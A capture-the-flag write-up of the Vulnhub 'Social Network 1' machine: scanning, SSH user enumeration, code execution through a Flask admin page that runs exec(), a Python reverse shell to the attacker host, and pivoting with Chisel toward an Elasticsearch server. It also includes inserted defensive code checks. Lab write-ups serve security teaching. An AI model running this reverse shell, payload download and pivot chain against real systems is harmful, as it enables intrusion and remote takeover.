BoredHackerBlog - Social Network 1 - Vulnhub - Level: Medium - Report

Medium

Tools used

nmap
nikto
gobuster
wfuzz
dirb
curl
msfconsole
python3
searchsploit
chisel
socat
wget


Reconnaissance

In this phase we gather information about the target system. We start with an ARP scan to determine the target's IP and MAC address. We then add the IP address to /etc/hosts to make working with the host easier.

┌──(root㉿CCat)-[~]
└─# arp-scan -l
192.168.2.117 08:00:27:a6:e2:ec PCS Systemtechnik GmbH
┌──(root㉿CCat)-[~]
└─# echo "192.168.2.117 boredhackerblog2.vln" >> /etc/hosts

Next we run an Nmap scan to identify open ports and services on the target. We use several options to tune the scan and obtain more detailed information.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000 | grep open
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)

We repeat the Nmap scan without the grep filter to get the full results. This gives us a more complete overview of the running services and their versions.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-24 22:01 CEST
Nmap scan report for boredhackerblog2.vln (192.168.2.117)
Host is up (0.00016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 cc:53:20:b8:10:db:52:5f:16:02:bc:ee:57:22:80:e1 (DSA)
| 2048 01:50:f6:1f:32:e8:0d:fc:48:38:3e:c8:1b:ac:20:02 (RSA)
| 256 3b:ae:9a:bd:cb:ff:8f:54:64:32:ec:bf:38:fd:fe:6b (ECDSA)
|_ 256 77:4e:8b:20:73:52:a4:ee:93:1d:b3:85:f2:25:d7:55 (ED25519)
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
|_http-server-header: Werkzeug/0.14.1 Python/2.7.15
|_http-title: Leave a message
MAC Address: 08:00:27:A6:E2:EC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.16 ms boredhackerblog2.vln (192.168.2.117)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.75 seconds

We use curl to fetch the HTTP headers and the content of the website on port 5000. This helps us identify the technology in use and possible weak spots.

┌──(root㉿CCat)-[~]
└─# curl --verbose http://192.168.2.117:5000 -s
* Trying 192.168.2.117:5000...
* Connected to 192.168.2.117 (192.168.2.117) port 5000
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 192.168.2.117:5000
> User-Agent: curl/8.10.1
> Accept: */*
>
* Request completely sent off
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Content-Type: text/html; charset=utf-8
< Content-Length: 644
< Server: Werkzeug/0.14.1 Python/2.7.15
< Date: Thu, 24 Oct 2024 20:05:10 GMT
<
Leave a message
Welcome to the new "Leave a message" social networking site
All the messages are anonymous. Don't worry, it's completely safe and secure
Messages

Hello!
Testin 123
This is a cool site
How do I contact the admin?
How is everyone doing?
Is anyone even using this?
' R sqlspider
ghz>hzx
hzx"zxc
zxc'xcv
form action="" method="POST"
.....
....
...
placeholder="Type your message here..."
* shutting down connection #0

Nikto is used to scan the target for known vulnerabilities. It identifies outdated software and missing security headers that could pose a risk.

┌──(root㉿CCat)-[~]
└─# nikto -h http://192.168.2.117:5000
- Nikto v2.5.0

+ Target IP: 192.168.2.117
+ Target Hostname: 192.168.2.117
+ Target Port: 5000
+ Start Time: 2024-10-24 22:03:32 (GMT+2)

+ Server: Werkzeug/0.14.1 Python/2.7.15
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Python/2.7.15 appears to be outdated (current is at least 3.9.6).
+ OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS .
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2024-10-24 22:03:51 (GMT+2) (19 seconds)

+ 1 host(s) tested

Web Enumeration

Gobuster is used to find hidden directories and files on the web server. The option -b '503,404,403' filters out unwanted status codes to keep the results clean.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x .txt,.php,.html,.d,rpm,js.map,pHtml -b '503,404,403' -e --no-error -k
http://192.168.2.117:5000/admin (Status: 200) [Size: 401]

We found the admin page! This page could contain sensitive information or functions that we could exploit.

http://192.168.2.117:5000/admin
Admin page
Code testing page
Nothing was ran. Input some code to exec()

The admin page appears to offer a code-testing function. This is a potential entry point for remote code execution (RCE).

To get a file onto the server, we start a simple HTTP server with Python.

┌──(root㉿CCat)-[~]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

We use Metasploit to enumerate SSH usernames on the target. This could help us find valid credentials for the SSH service.

┌──(root㉿CCat)-[~]
└─# msfconsole -q -x "search ssh_enum"
Matching Modules

#  Name                                     Disclosure Date  Rank    Check  Description
-  ----                                     ---------------  ----    -----  -----------
0  auxiliary/scanner/ssh/ssh_enumusers      .                normal  No     SSH Username Enumeration
1    \_ action: Malformed Packet            .                .       .      Use a malformed packet
2    \_ action: Timing Attack               .                .       .      Use a timing attack
3  auxiliary/scanner/ssh/ssh_enum_git_keys  .                normal  No     Test SSH Github Access


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/ssh/ssh_enum_git_keys
msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_enumusers) > options
Module options (auxiliary/scanner/ssh/ssh_enumusers):

Name          Current Setting  Required  Description
----          ---------------  --------  -----------
CHECK_FALSE   true             no        Check for false positives (random username)
DB_ALL_USERS  false            no        Add all users in the current database to the list
Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT         22               yes       The target port
THREADS       1                yes       The number of concurrent threads (max one per host)
THRESHOLD     10               yes       Amount of seconds needed before a user is considered found (timing attack only)
USERNAME                       no        Single username to test (username spray)
USER_FILE                      no        File containing usernames, one per line


Auxiliary action:

Name              Description
----              -----------
Malformed Packet  Use a malformed packet
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 192.168.2.117
RHOSTS => 192.168.2.117
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RPORT 22
RPORT => 22
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 10
THREADS => 10
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set THRESHOLD 10
THRESHOLD => 10
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run
[+] 192.168.2.117:22 - SSH - User 'john' found
[+] 192.168.2.117:22 - SSH - User 'mail' found
[+] 192.168.2.117:22 - SSH - User 'root' found
[+] 192.168.2.117:22 - SSH - User 'news' found
[+] 192.168.2.117:22 - SSH - User 'man' found
[+] 192.168.2.117:22 - SSH - User 'bin' found

Metasploit successfully found SSH usernames on the target! This improves our chances of logging in to the system later.

Initial Access

We test whether a sleep call works on the admin page. This is a simple timing test to see whether we can execute code.

http://192.168.2.117:5000/admin
import subprocess
import time
process = subprocess.Popen(['sleep', '10'],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
stdout, stderr

The sleep call works (the response is delayed by ten seconds)! This confirms that we can execute code on the target system.

We try to make the target fetch a file from our machine with wget. This is another test to see whether we can compromise the system.

┌──(root㉿CCat)-[~]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.2.117 - - [24/Oct/2024 22:43:14] "GET /user.txt HTTP/1.1" 200 -

We try to download the file.

http://192.168.2.117:5000/admin
import subprocess
import time
process = subprocess.Popen(['wget', 'http://192.168.2.199/user.txt'],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
stdout, stderr

import subprocess
import time
process = subprocess.Popen(['wget', 'http://192.168.2.199/rce.php'],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
stdout, stderr

We try to set up a reverse shell. This is our goal in order to gain full access to the system.

┌──(root㉿CCat)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
http://192.168.2.117:5000/admin
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.199",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Yesss! We have a reverse shell! We are now logged in as root! Fantastic, root access was successful, we have reached our goal!

┌──(root㉿CCat)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.199] from (UNKNOWN) [192.168.2.117] 46029
/app #
/app # which python
/usr/local/bin/python
/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/app # ls /root
/app # ls -la /root
total 12
drwx 3 root root 4096 Oct 29 2018 .
drwxr-xr-x 43 root root 4096 Oct 24 20:43 ..
drwx 3 root root 4096 Oct 29 2018 .cache
/app # ls -la /root/.cache
total 12
drwx 3 root root 4096 Oct 29 2018 .
drwx 3 root root 4096 Oct 29 2018 ..
drwx 4 root root 4096 Oct 29 2018 pip
/app # grep sh /etc/passwd
root:x:0:0:root:/root:/bin/ash
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
operator:x:11:0:operator:/root:/bin/sh
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
/app # cat /proc/1/cgroup
11:hugetlb:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
10:perf_event:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
9:blkio:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
8:freezer:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
7:devices:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
6:memory:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
5:cpuacct:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
4:cpu:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
3:cpuset:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
2:name=systemd:/docker/110a80582af79eaba45f0f6b9de58ef9032bca5b3dd5f7870436ea275eb3d7a9
/app # ifconfig
eth0 Link encap:Ethernet HWaddr 02:42:AC:11:00:02
inet addr:172.17.0.2 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:7380854 errors:0 dropped:0 overruns:0 frame:0
TX packets:6888226 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:592167064 (564.7 MiB) TX bytes:811778913 (774.1 MiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
/app # cat /etc/issue
Welcome to Alpine Linux 3.8
Kernel \r on an \m (\l)

Privilege Escalation POC

Since we already have a root shell, we can now try to reach other systems on the network. We start the pivoting process.

We use Chisel for port forwarding.

/app # ss -altpn
/bin/sh: ss: not found
/app # netstat -altpn
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN 9693/netstat
tcp 0 54 172.17.0.2:46029 192.168.2.199:4444 ESTABLISHED 9693/netstat
tcp 0 0 172.17.0.2:5000 192.168.2.199:35604 ESTABLISHED 9693/netstat
/app # ip a
1: lo: mtu 65536 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
4: eth0: mtu 1500 qdisc noqueue state UP
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever

We upload a static Nmap binary to the target system to scan further ports.

┌──(root㉿CCat)-[~/Hackingtools/shells]
└─# mv /home/ccat/Downloads/nmap .
┌──(root㉿CCat)-[~/Hackingtools/shells]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.2.117 - - [24/Oct/2024 23:05:18] "GET /nmap HTTP/1.1" 200 -
/app # wget 192.168.2.199/nmap
Connecting to 192.168.2.199 (192.168.2.199:80)
nmap 100% |********************************| 5805k 0:00:00 ETA
/app # chmod +x nmap
/app # ./nmap
Nmap 6.49BETA1 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL : Input from list of hosts/networks
-iR : Choose random targets
--exclude : Exclude hosts/networks
--excludefile : Exclude list from file


Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-10-24 21:06 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 110a80582af7 (172.17.0.2)
Host is up (0.000033s latency).
All 1289 scanned ports on 110a80582af7 (172.17.0.2) are closed

We upload another shell script (spookyscan.sh) to scan ports.

chmod +x ./spookyscan.sh
./spookyscan.sh -i 192.168.1.1 -p 1024
#!/bin/bash
# Arguments for the script: -i/--ip target address, -p/--ports highest port to test
while [ "$1" != "" ]; do
    case "$1" in
        -i | --ip ) ip="$2"; shift;;
        -p | --ports ) ports="$2"; shift;;
    esac
    shift
done
# Checking that -i was given (the original "[[ $ip $empty ]]" test was inverted)
if [[ -z "$ip" ]]; then
    echo "Please specify an IP address with -i"
    exit 1
fi
# Checking that -p was given
if [[ -z "$ports" ]]; then
    echo "Please specify the max port range -p"
    exit 1
fi
# Scans ports 1..$ports via bash's /dev/tcp; closed ports are discarded, open ports are printed
for i in $(seq 1 "$ports"); do
    ( echo > "/dev/tcp/$ip/$i" ) > /dev/null 2>&1 && echo "$ip:$i is open"
done

We try to start an interactive shell with Python, but it fails: /bin/bash does not exist in this Alpine container (root's login shell is /bin/ash, as /etc/passwd showed).

/app # /usr/local/bin/python -c 'import pty;pty.spawn("/bin/bash")'
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/usr/local/lib/python2.7/pty.py", line 167, in spawn
os.execlp(argv[0], *argv)
File "/usr/local/lib/python2.7/os.py", line 329, in execlp
execvp(file, args)
File "/usr/local/lib/python2.7/os.py", line 346, in execvp
_execvpe(file, args)
File "/usr/local/lib/python2.7/os.py", line 370, in _execvpe
func(file, *argrest)
OSError: [Errno 2] No such file or directory

We list the files in the current directory.

/app # ls -la
total 5844
drwxr-xr-x 3 root root 4096 Oct 24 21:15 .
drwxr-xr-x 43 root root 4096 Oct 24 20:43 ..
-rw-r--r-- 1 root root 182 Oct 29 2018 Dockerfile
-rw-r--r-- 1 root root 1326 Oct 29 2018 main.py
-rwxr-xr-x 1 root root 5944464 Oct 24 21:05 nmap
-rw-r--r-- 1 root root 46 Oct 24 20:44 rce.php
-rw-r--r-- 1 root root 6 Oct 28 2018 requirements.txt
-rwxr-xr-x 1 root root 566 Oct 24 21:15 spookyscan.sh
drwxr-xr-x 2 root root 4096 Oct 29 2018 templates
-rw-r--r-- 1 root root 35 Oct 24 20:43 user.txt

We display the contents of main.py.

/app # cat main.py
from flask import Flask, request
from flask import render_template

app = Flask(__name__)

message_list = ["Hello!", "Testin 123", "This is a cool site", "How do I contact the admin?", "How is everyone doing?", "Is anyone even using this?"]

@app.route('/',methods=['POST', 'GET'])
def index():
    if request.method == 'GET':
        return render_template('index.html',message_list=message_list)
    if request.method == 'POST':
        if len(request.form['message']) > 3:
            message_list.append(request.form['message'])
            return render_template('index.html',message_list=message_list)
        else:
            return "Message not long enough"

@app.route('/admin',methods=['POST', 'GET'])
def admin():
    if request.method == 'GET':
        return render_template('admin.html',output="Nothing was ran. Input some code to exec()")
    if request.method == 'POST':
        if len(request.form['code']) > 3:
            try:
                exec(request.form['code'])
                return render_template('admin.html',output="Ran the code")
            except:
                return render_template('admin.html',output="Something went wrong with running the code")
        else:
            return "Code not long enough"

if __name__ == '__main__':
    app.run(host="0.0.0.0",port=5000,threaded=True)
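The admin route above hands request.form['code'] straight to exec(), which is the whole vulnerability. As an added example (not code from the writeup or from the challenge), here is a small AST-based check a code reviewer can run over a Flask module to flag exec/eval/compile calls fed from request data; the sample module it scans is constructed to mirror the vulnerable route, and the hardened sample simply has no code-execution feature at all.

```python
"""Flag exec()/eval()/compile() calls fed from Flask request data.

Added example, not part of the original writeup: the /admin route in main.py
passes request.form['code'] straight to exec(). This walks a module's AST and
reports such calls, following taint through simple local assignments
(e.g. code = request.form['code']; exec(code)).
"""
import ast
from dataclasses import dataclass

DANGEROUS_CALLS = {"exec", "eval", "compile"}
# Attributes of flask.request that carry client-controlled data
REQUEST_SOURCES = {"form", "args", "values", "json", "data", "files", "get_json"}


@dataclass(frozen=True)
class Finding:
    function: str   # enclosing view function
    lineno: int     # line of the dangerous call
    call: str       # exec / eval / compile


def _reads_request(node: ast.AST, tainted: set) -> bool:
    """True if the expression reads flask.request data or a tainted local."""
    for sub in ast.walk(node):
        if (isinstance(sub, ast.Attribute) and isinstance(sub.value, ast.Name)
                and sub.value.id == "request" and sub.attr in REQUEST_SOURCES):
            return True
        if isinstance(sub, ast.Name) and sub.id in tainted:
            return True
    return False


def find_request_exec(source: str) -> list:
    """Return one Finding per exec/eval/compile call reachable from request data."""
    tree = ast.parse(source)
    findings = []
    for func in ast.walk(tree):
        if not isinstance(func, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        # Pass 1: locals assigned from request data (one level of propagation)
        tainted = set()
        for node in ast.walk(func):
            if isinstance(node, ast.Assign) and _reads_request(node.value, tainted):
                tainted.update(t.id for t in node.targets if isinstance(t, ast.Name))
        # Pass 2: dangerous calls whose arguments touch request data or tainted locals
        for node in ast.walk(func):
            if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                    and node.func.id in DANGEROUS_CALLS
                    and any(_reads_request(a, tainted) for a in node.args)):
                findings.append(Finding(func.name, node.lineno, node.func.id))
    return findings


# Constructed sample mirroring the writeup's main.py: /admin exec()s the form
# field directly, /run goes through a local variable, / is clean.
SAMPLE_VULNERABLE = '''\
from flask import Flask, request
app = Flask(__name__)

@app.route('/admin', methods=['POST', 'GET'])
def admin():
    if request.method == 'POST':
        exec(request.form['code'])
        return "Ran the code"
    return "Nothing was ran. Input some code to exec()"

@app.route('/run')
def run():
    code = request.args.get('code')
    eval(code)

@app.route('/')
def index():
    return "hello"
'''

# Hardened variant for comparison: the code-execution feature is removed outright.
SAMPLE_FIXED = '''\
from flask import Flask, abort
app = Flask(__name__)

@app.route('/admin', methods=['GET'])
def admin():
    abort(404)
'''

if __name__ == "__main__":
    for f in find_request_exec(SAMPLE_VULNERABLE):
        print(f"{f.function}:{f.lineno}: {f.call}() called on request-controlled data")
    print("fixed sample findings:", find_request_exec(SAMPLE_FIXED))
```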

We query the container's IP address.

/app # hostname -i
172.17.0.2

We run an Nmap ping sweep to find other hosts on the Docker network.

/app # ./nmap -sn 172.17.0.2/24 -T5 -n
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-10-24 21:24 UTC
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.17.0.1
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.0000090s latency).
MAC Address: 02:42:18:13:A9:96 (Unknown)
Nmap scan report for 172.17.0.3
Host is up (0.0000080s latency).
MAC Address: 02:42:AC:11:00:03 (Unknown)
Nmap scan report for 172.17.0.2
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 4.03 seconds

We run a full port scan against the other host, 172.17.0.3.

/app # ./nmap -Pn -n -T5 172.17.0.3 -p-
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-10-24 21:26 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Host is up (0.000014s latency).
PORT STATE SERVICE
9200/tcp open wap-wsp
9300/tcp open unknown
MAC Address: 02:42:AC:11:00:03 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.31 seconds

We look up information on port 9200.

https://www.google.de/search?q=9200%252Ftcp+open++wap-wsp+
9200 - Pentesting Elasticsearch - HackTricks
HackTricks
https://book.hacktricks.xyz › network-services-pentesting
Jul 19, 2024 — Elasticsearch is a distributed, open source search and analytics engine for all types of data. It is known for its speed, scalability, and simple REST APIs.

Elasticsearch found! We try to retrieve information from Elasticsearch.

/app # wget 172.17.0.3:9200
Connecting to 172.17.0.3:9200 (172.17.0.3:9200)
{
  "status" : 200,
  "name" : "Drax the Destroyer",
  "cluster_name" : "elasticsearch",
  "version" : {
    "number" : "1.4.2",
    "build_hash" : "927caff6f05403e936c20bf4529f144f0c89fd8c",
    "build_timestamp" : "2014-12-16T14:11:12Z",
    "build_snapshot" : false,
    "lucene_version" : "4.10.2"
  },
  "tagline" : "You Know, for Search"
}
- 100% |********************************| 346 0:00:00 ETA
/app # ls -la
total 5844
drwxr-xr-x 3 root root 4096 Oct 24 21:15 .
drwxr-xr-x 43 root root 4096 Oct 24 20:43 ..
-rw-r--r-- 1 root root 182 Oct 29 2018 Dockerfile
-rw-r--r-- 1 root root 1326 Oct 29 2018 main.py
-rwxr-xr-x 1 root root 5944464 Oct 24 21:05 nmap
-rw-r--r-- 1 root root 46 Oct 24 20:44 rce.php
-rw-r--r-- 1 root root 6 Oct 28 2018 requirements.txt
-rwxr-xr-x 1 root root 566 Oct 24 21:15 spookyscan.sh
drwxr-xr-x 2 root root 4096 Oct 29 2018 templates
-rw-r--r-- 1 root root 35 Oct 24 20:43 user.txt

We display the contents of user.txt.

/app # cat user.txt
admin
graham
sarah
jens
mark
vince

We search for Elasticsearch exploits.

┌──(root㉿CCat)-[~/Hackingtools/shells]
└─# searchsploit elasticsearch
Exploit Title | Path
---------------------------------------------------------+------------------------------------
ElasticSearch - Remote Code Execution | linux/remote/36337.py
ElasticSearch - Remote Code Execution | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Bypass (Metasploit) | java/remote/36415.rb
Elasticsearch - StackOverflow DoS | multiple/dos/51787.txt
ElasticSearch 1.6.0 - Arbitrary File Download | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary Java Execution (Me | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Database Dump | multiple/webapps/50152.py

Shellcodes: No Results
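The searchsploit list only makes sense once it is matched against the version the banner reported (1.4.2). As an added example (not from the writeup or from any tool it uses), the following parses the JSON that Elasticsearch returns on GET / and reports which of the listed issues apply; the affected range for CVE-2015-1427 (1.3.0-1.3.7 and 1.4.0-1.4.2) is taken from the upstream advisory, the "< 1.4.5 / < 1.5.2" range for the directory traversal comes from the searchsploit line for EDB 37054, and the banner is a constructed copy of the one captured above.

```python
"""Assess an Elasticsearch GET / banner against the exploit-db hits above.

Added example, not part of the writeup. Parses the banner JSON, extracts
version.number and reports which listed issues apply to that version.
"""
import json
from typing import List, Tuple

Version = Tuple[int, ...]


def parse_version(text: str) -> Version:
    """'1.4.2' -> (1, 4, 2); a pre-release suffix such as '1.4.2-beta' is dropped."""
    core = text.split("-")[0]
    return tuple(int(p) for p in core.split("."))


def affected_by_groovy_rce(v: Version) -> bool:
    """CVE-2015-1427 / EDB 36337: Groovy sandbox bypass, affects 1.3.0-1.3.7 and
    1.4.0-1.4.2 (fixed in 1.3.8 and 1.4.3; fact from the upstream advisory)."""
    return (1, 3, 0) <= v < (1, 3, 8) or (1, 4, 0) <= v < (1, 4, 3)


def affected_by_traversal(v: Version) -> bool:
    """EDB 37054: '< 1.4.5 / < 1.5.2' exactly as searchsploit lists it."""
    if v[:2] == (1, 5):
        return v < (1, 5, 2)
    return v < (1, 4, 5)


def assess_banner(banner_json: str) -> List[str]:
    """Return the labels of all listed issues that apply to the banner's version."""
    banner = json.loads(banner_json)
    v = parse_version(banner["version"]["number"])
    issues = []
    if affected_by_groovy_rce(v):
        issues.append("CVE-2015-1427 Groovy sandbox bypass RCE (EDB 36337)")
    if affected_by_traversal(v):
        issues.append("directory traversal (EDB 37054)")
    return issues


# Constructed copy of the banner the writeup captured from 172.17.0.3:9200
SAMPLE_BANNER = """{
  "status": 200,
  "name": "Drax the Destroyer",
  "cluster_name": "elasticsearch",
  "version": {
    "number": "1.4.2",
    "build_hash": "927caff6f05403e936c20bf4529f144f0c89fd8c",
    "build_timestamp": "2014-12-16T14:11:12Z",
    "build_snapshot": false,
    "lucene_version": "4.10.2"
  },
  "tagline": "You Know, for Search"
}"""

if __name__ == "__main__":
    for issue in assess_banner(SAMPLE_BANNER):
        print("affected:", issue)
```

An unauthenticated GET / that returns this banner is itself a finding: the version is exposed to anyone who can reach port 9200, which is why the Docker network placement mattered here.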

We copy an exploit to our system.

┌──(root㉿CCat)-[~]
└─# searchsploit -m linux/remote/36337.py
Exploit: ElasticSearch - Remote Code Execution
URL: https://www.exploit-db.com/exploits/36337
Path: /usr/share/exploitdb/exploits/linux/remote/36337.py
Codes: CVE-2015-1427, SVDB-118239
Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /root/36337.py
┌──(root㉿CCat)-[~]
└─# mv /root/36337.py elasticsearch.py
┌──(root㉿CCat)-[~]
└─# ll ela*
-rwxr-xr-x 1 root root 3278 Oct 24 23:46 elasticsearch.py

We run the exploit without arguments to see its usage.

┌──(root㉿CCat)-[~]
└─# python2 elasticsearch.py
Use: elasticsearch.py target

We use Chisel for port forwarding: the client on the container forwards 172.17.0.3:9200 back to port 9200 on our machine.

┌──(root㉿CCat)-[~]
└─# cd Hackingtools/chisel
┌──(root㉿CCat)-[~/Hackingtools/chisel]
└─# ll
total 8740
-rwsrwsr-x 1 ccat ccat 8945816 Aug 25 00:43 chisel
┌──(root㉿CCat)-[~/Hackingtools/chisel]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
┌──(root㉿CCat)-[~/Hackingtools/chisel]
└─# ./chisel server --reverse -p 1234
2024/10/24 23:53:34 server: Reverse tunnelling enabled
2024/10/24 23:53:34 server: Fingerprint gu/VwB1NgcKTNg+mhMVr0iodyncyhNbi6WN+mszX4I=
2024/10/24 23:53:34 server: Listening on http://0.0.0.0:1234
/app # chmod +x chisel
/app # ./chisel client 192.168.2.199:1234 R:9200:172.17.0.3:9200
2024/10/24 21:54:30 client: Connecting to ws://192.168.2.199:1234
2024/10/24 21:54:30 client: Connected (Latency 380.358µs)
┌──(root㉿CCat)-[~/Hackingtools/chisel]
└─# ./chisel server --reverse -p 1234
2024/10/24 23:53:34 server: Reverse tunnelling enabled
2024/10/24 23:53:34 server: Fingerprint gu/VwB1NgcKTNg+mhMVr0iodyncyhNbi6WN+mszX4I=
2024/10/24 23:53:34 server: Listening on http://0.0.0.0:1234
2024/10/24 23:54:30 server: session#1: tun: proxy#R:9200=>172.17.0.3:9200: Listening
192.168.2.199:9200
{
  "status" : 200,
  "name" : "Drax the Destroyer",
  "cluster_name" : "elasticsearch",
  "version" : {
    "number" : "1.4.2",
    "build_hash" : "927caff6f05403e936c20bf4529f144f0c89fd8c",
    "build_timestamp" : "2014-12-16T14:11:12Z",
    "build_snapshot" : false,
    "lucene_version" : "4.10.2"
  },
  "tagline" : "You Know, for Search"
}

We try to retrieve information from Elasticsearch through the tunnel.

┌──(root㉿CCat)-[~]
└─# curl -s http://192.168.2.199:9200/_cat/indices?v
health status index pri rep docs.count docs.deleted store.size pri.store.size
yellow open blog 5 1 1 0 3kb 3kb
┌──(root㉿CCat)-[~]
└─# curl -s http://192.168.2.199:9200/blog | tr "," "\n"
{"blog":{"mappings":{"user":{"properties":{"name":{"type":"string"}}}}
"settings":{"index":{"creation_date":"1729799457745"
"uuid":"3kdJIs98QBKAcfQBq7ZVFA"
"number_of_replicas":"1"
"number_of_shards":"5"
"version":{"created":"1040299"}}}}}
